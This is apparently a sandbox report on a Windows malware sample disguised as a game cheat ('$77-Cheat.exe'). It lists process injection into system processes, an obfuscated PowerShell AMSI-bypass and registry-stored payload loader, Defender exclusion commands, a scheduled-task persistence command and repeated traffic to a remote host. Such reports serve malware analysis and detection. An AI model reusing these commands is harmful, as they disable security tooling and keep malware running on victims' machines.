PID 4172 wrote to memory of 424 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 1008 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4172 wrote to memory of 1124 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 1136 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4172 wrote to memory of 1156 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 1180 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 1208 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4172 wrote to memory of 1344 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 1352 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 1372 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 1444 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 1576 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 1600 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4172 wrote to memory of 1636 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4172 wrote to memory of 1720 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 1756 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4172 wrote to memory of 1776 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4172 wrote to memory of 1824 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4172 wrote to memory of 1964 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 1972 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4172 wrote to memory of 1512 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4172 wrote to memory of 1508 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 1920 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 2108 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 4172 wrote to memory of 2200 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4172 wrote to memory of 2356 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4172 wrote to memory of 2504 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 2520 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 2676 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 2716 N/A C:\Windows\System32\dllhost.exe C:\Windows\sysmon.exe
PID 4172 wrote to memory of 2732 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 2748 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4172 wrote to memory of 2760 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 2828 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\sihost.exe
PID 4172 wrote to memory of 2928 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\unsecapp.exe
PID 4172 wrote to memory of 2968 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 2976 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\taskhostw.exe
PID 4172 wrote to memory of 3168 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 3348 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 3432 N/A C:\Windows\System32\dllhost.exe C:\Windows\Explorer.EXE
PID 4172 wrote to memory of 3572 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4172 wrote to memory of 3748 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe
PID 4172 wrote to memory of 3936 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\RuntimeBroker.exe
PID 4172 wrote to memory of 3456 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\RuntimeBroker.exe
PID 4172 wrote to memory of 4368 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\RuntimeBroker.exe
PID 4172 wrote to memory of 4968 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x238,0x23c,0x240,0x234,0x260,0x7ffbfd89ceb8,0x7ffbfd89cec4,0x7ffbfd89ced0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1948,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=2424 /prefetch:3

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe

"C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe"

C:\Users\Admin\$77-Cheat.exe

"C:\Users\Admin\$77-Cheat.exe"

C:\Users\Admin\Install.exe

"C:\Users\Admin\Install.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OfjbnHQFAFGn{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$tmgXlgVgKfzaXD,[Parameter(Position=1)][Type]$KLAaqqCLFR)$cQUvuWFjdBc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+'a'+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+'T'+[Char](121)+''+[Char](112)+'e',''+[Char](67)+'la'+[Char](115)+'s'+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+'c,S'+[Char](101)+'a'+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+'si'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+'t'+'o'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$cQUvuWFjdBc.DefineConstructor('RTS'+[Char](112)+''+[Char](101)+'c'+[Char](105)+'alN'+'a'+''+[Char](109)+'e'+[Char](44)+'H'+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+'g'+','+''+[Char](80)+''+'u'+'bl'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$tmgXlgVgKfzaXD).SetImplementationFlags(''+[Char](82)+'unt'+'i'+''+[Char](109)+''+'e'+''+','+''+'M'+'a'+'n'+''+'a'+''+[Char](103)+'ed');$cQUvuWFjdBc.DefineMethod('I'+'n'+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+'i'+'d'+'eB'+[Char](121)+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+'S'+'l'+''+'o'+''+'t'+','+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+'l',$KLAaqqCLFR,$tmgXlgVgKfzaXD).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $cQUvuWFjdBc.CreateType();}$XtpiVHBAXZYZu=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+'os'+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n32'+'.'+''+[Char](85)+'ns'+'a'+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+'M'+'e'+'t'+'ho'+[Char](100)+''+'s'+'');$sPiklldOzpbOFq=$XtpiVHBAXZYZu.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+'r'+'o'+'cA'+[Char](100)+'d'+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+'b'+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+[Char](116)+''+'a'+'t'+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KeeMfKSzIeUNWqVBYkl=OfjbnHQFAFGn @([String])([IntPtr]);$MDPsIrSOKuwFkBFjxVUgju=OfjbnHQFAFGn @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hzXiZGkCyun=$XtpiVHBAXZYZu.GetMethod(''+[Char](71)+'e'+'t'+'M'+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+'n'+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+'32'+[Char](46)+''+'d'+'l'+'l'+'')));$uYfBDbjCZgyPxU=$sPiklldOzpbOFq.Invoke($Null,@([Object]$hzXiZGkCyun,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+'b'+''+'r'+''+'a'+''+[Char](114)+''+'y'+''+'A'+'')));$ViVSnqkeByTPJwTWe=$sPiklldOzpbOFq.Invoke($Null,@([Object]$hzXiZGkCyun,[Object](''+[Char](86)+'ir'+[Char](116)+''+[Char](117)+''+[Char](97)+'lP'+'r'+'o'+'t'+''+[Char](101)+''+[Char](99)+''+'t'+'')));$gfySRHp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uYfBDbjCZgyPxU,$KeeMfKSzIeUNWqVBYkl).Invoke(''+[Char](97)+''+'m'+''+'s'+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$QypZYRKJvIDzLosDw=$sPiklldOzpbOFq.Invoke($Null,@([Object]$gfySRHp,[Object](''+[Char](65)+'m'+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+'Bu'+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$SERvNNgWCd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ViVSnqkeByTPJwTWe,$MDPsIrSOKuwFkBFjxVUgju).Invoke($QypZYRKJvIDzLosDw,[uint32]8,4,[ref]$SERvNNgWCd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QypZYRKJvIDzLosDw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ViVSnqkeByTPJwTWe,$MDPsIrSOKuwFkBFjxVUgju).Invoke($QypZYRKJvIDzLosDw,[uint32]8,0x20,[ref]$SERvNNgWCd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+'R'+'E').GetValue('$'+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+'a'+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{53a48db0-9797-4fc3-869a-947d648fb4b2}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe f23cff6647ca97de8ba2401f099d5815 l+I6MEclzE+nt+gnbNiLdw.0.1.0.0.0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\$77-Cheat.exe'

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-Cheat.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4208,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=4092 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\$77-Powershell.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-Powershell.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-Powershell" /tr "C:\Users\Admin\$77-Powershell.exe"

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 uk2.localto.net udp
GB 140.238.91.110:9979 uk2.localto.net tcp
NL 52.142.223.178:80 tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp

Files

memory/1384-0-0x00007FFC06943000-0x00007FFC06945000-memory.dmp

memory/1384-1-0x0000000000940000-0x000000000098A000-memory.dmp

C:\Users\Admin\$77-Cheat.exe

MD5 419a7b960bc493733acab7a685e22cf7
SHA1 bfed97bc33a336e2c696e1e1541bce0206d6fabc
SHA256 dae0d531b5e148bbaf889de678b328f1e798b790aac68927526e47acc7459669
SHA512 dc00eebd3a7191f222b8620a52e896d3ecbf8e3381f1b186553c807d3da75e6466b01ff77d7f117af540da6e5da277dd6ac27e7f5aa64fba416c6ce9b736e114

C:\Users\Admin\Install.exe

MD5 b51552b77057c2405f73bbbf9c89234a
SHA1 4793adbba023f90d2d2ad0ec55199c56de815224
SHA256 720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0
SHA512 564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66

memory/4148-49-0x0000000000CB0000-0x0000000000CCC000-memory.dmp

memory/4148-50-0x00007FFC06940000-0x00007FFC07401000-memory.dmp

C:\Windows\Temp\__PSScriptPolicyTest_hk50gxkn.kgm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1800-60-0x0000028CD4830000-0x0000028CD4852000-memory.dmp

memory/1800-61-0x0000028CD4800000-0x0000028CD482A000-memory.dmp

memory/1800-62-0x00007FFC24F70000-0x00007FFC25165000-memory.dmp

memory/1800-63-0x00007FFC235D0000-0x00007FFC2368E000-memory.dmp

memory/4172-65-0x0000000140000000-0x0000000140008000-memory.dmp

memory/4172-67-0x0000000140000000-0x0000000140008000-memory.dmp

memory/4172-66-0x0000000140000000-0x0000000140008000-memory.dmp

memory/4172-64-0x0000000140000000-0x0000000140008000-memory.dmp

memory/4172-71-0x00007FFC235D0000-0x00007FFC2368E000-memory.dmp

memory/4172-70-0x00007FFC24F70000-0x00007FFC25165000-memory.dmp

memory/4172-69-0x0000000140000000-0x0000000140008000-memory.dmp

memory/4172-74-0x0000000140000000-0x0000000140008000-memory.dmp

memory/612-77-0x000002A9B7EE0000-0x000002A9B7F05000-memory.dmp

memory/612-78-0x000002A9B7F10000-0x000002A9B7F3A000-memory.dmp

memory/612-79-0x000002A9B7F10000-0x000002A9B7F3A000-memory.dmp

memory/612-85-0x00007FFBE4FF0000-0x00007FFBE5000000-memory.dmp

memory/612-84-0x000002A9B7F10000-0x000002A9B7F3A000-memory.dmp

memory/676-95-0x00007FFBE4FF0000-0x00007FFBE5000000-memory.dmp

memory/60-114-0x000001FA50C00000-0x000001FA50C2A000-memory.dmp

